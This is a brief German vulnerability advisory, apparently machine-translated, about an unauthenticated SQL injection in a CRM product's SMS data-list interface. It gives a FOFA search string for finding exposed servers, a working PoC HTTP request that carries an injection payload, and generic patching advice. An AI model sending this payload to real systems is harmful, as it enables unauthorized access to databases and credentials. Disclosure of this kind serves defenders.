0x01 Produkteinführung
Renwoxing CRM (Customer Relationship Management) ist eine professionelle CRM-Software auf Unternehmensebene, die Unternehmen dabei hilft, Kundenbeziehungen effektiv zu verwalten, die Vertriebseffizienz zu verbessern und personalisierten Kundenservice zu bieten.
0x02-Schwachstellenübersicht
In der SmsDataList-Schnittstelle von Renwohang CRM besteht eine SQL-Injection-Schwachstelle. Nicht authentifizierte Angreifer können diese Schwachstelle ausnutzen, um vertrauliche Datenbankinformationen und Anmeldeinformationen abzurufen, was schließlich zum Absturz des Servers führen kann.
0x03 Wiederholungsumgebung
FOFA: „Willkommen bei Renwoxing CRM“
0x04 Wiederauftreten der Sicherheitslücke
PoC
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
sqlmap-Authentifizierung
0x05 Reparaturvorschlag
vorläufiger Abhilfeplan
Beschränken Sie die Zugriffsquellenadressen und öffnen Sie das System nicht für das Internet, es sei denn, dies ist erforderlich.
Upgrade-Reparaturlösung
Aktualisieren Sie auf eine sichere Version oder wenden Sie einen Patch an!